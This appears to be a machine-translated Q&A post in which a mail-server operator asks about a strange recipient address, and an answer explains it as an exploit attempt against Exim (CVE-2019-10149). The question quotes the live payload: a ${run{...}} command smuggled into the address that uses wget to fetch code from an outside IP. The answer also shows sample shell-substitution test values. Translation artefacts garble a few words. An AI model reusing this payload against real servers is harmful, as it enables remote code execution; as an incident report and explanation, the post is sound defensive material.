Я управляю собственным почтовым сервером, и время от времени люди отправляют спам или что-то непонятное на корневой аккаунт. Недавно я получил пустое письмо, которое было адресовано:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@мойдомен.tld
Второй IP-адрес в этой строке, похоже, принадлежит той же хостинговой компании, у которой я арендую свой сервер.бегатьиwgetМне это кажется очень подозрительным, но я ничего не нашел о подобной атаке в Интернете.
Согласно почтовому журналу сервера, это письмо было отправлено с адреса 148.72.206.111. Однако,Отполе было установлено на[email protected].
Кто-нибудь знает что это значит?
решение1
Это попытка использовать недавно обнаруженную ошибку в SMTP-сервере Exim4 (версии от v4.87 до v4.91), которая позволила бы удаленное выполнение команд, поскольку Exim расширял бы ${variable}подстановки в определенных местах, где на самом деле этого делать не следовало. (Этот синтаксис широко используется в основном файле конфигурации Exim.)
Ошибка известна какCVE-2019-10149(у него пока нет торговой марки или логотипа). Если бы вы использовали Exim4 из вашего дистрибутива, вы бы уже получили исправления. Поскольку вы используете Postfix, это вас изначально не затрагивает.
(Тем не менее, даже в Postfix параметр после +часто используется как часть командной строки, например, при вызове Procmail. Я бы, вероятно, рекомендовал провести несколько тестов на вашем собственном сервере, чтобы посмотреть, как он обрабатывает такие вещи, как someuser+$(blah)@или someuser+`blah`@.)